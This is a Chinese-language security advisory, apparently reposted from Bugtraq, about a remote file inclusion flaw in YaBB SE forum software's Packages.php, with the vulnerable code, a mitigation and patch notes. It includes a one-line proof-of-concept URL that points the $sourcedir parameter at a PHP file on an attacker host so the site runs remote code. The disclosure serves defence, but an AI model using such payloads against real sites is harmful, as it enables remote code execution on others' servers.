发布日期：2003-01-23
更新日期：2003-01-31

受影响系统：

YaBB YaBB SE 1.5.0
YaBB YaBB SE 1.4.1

描述：

---

BUGTRAQ  ID: 6663

YaBB SE是一款开放源代码基于WEB的论坛程序。

YaBB SE包含的Packages.php脚本对用户提交的参数缺少正确输入，远程攻击者可以利用这个漏洞构建恶意服务器，提供PHP文件，通过提交特殊URL以WEB进程权限运行PHP中包含的代码。

YaBB SE中"Sources"目录包含的"Packages.php"脚本包含如下代码：

********
..

global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");
    
$pacmanver = "1.4.1";

include_once("$sourcedir/Packer.php");

..

********

可以看到上面的$sourcedir没有定义，因此可以通过全局注入来进行变量定义，攻击者可以通过把恶意PHP文件存放在自己控制的服务器上，并指定$sourcedir变量为恶意PHP文件路径，就可以提交特殊URI请求以WEB进程权限执行恶意PHP文件中的代码。

<*来源：Mindwarper （logger@hehe.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104326499628911&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Mindwarper （logger@hehe.com）提供了如下测试方法：

http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/Packer.php

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 限制用户的/Sources/目录的访问，如使用.htaccess文件。

厂商补丁：

YaBB
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/yabbse

浏览次数：4029
严重程度：0（网友投票）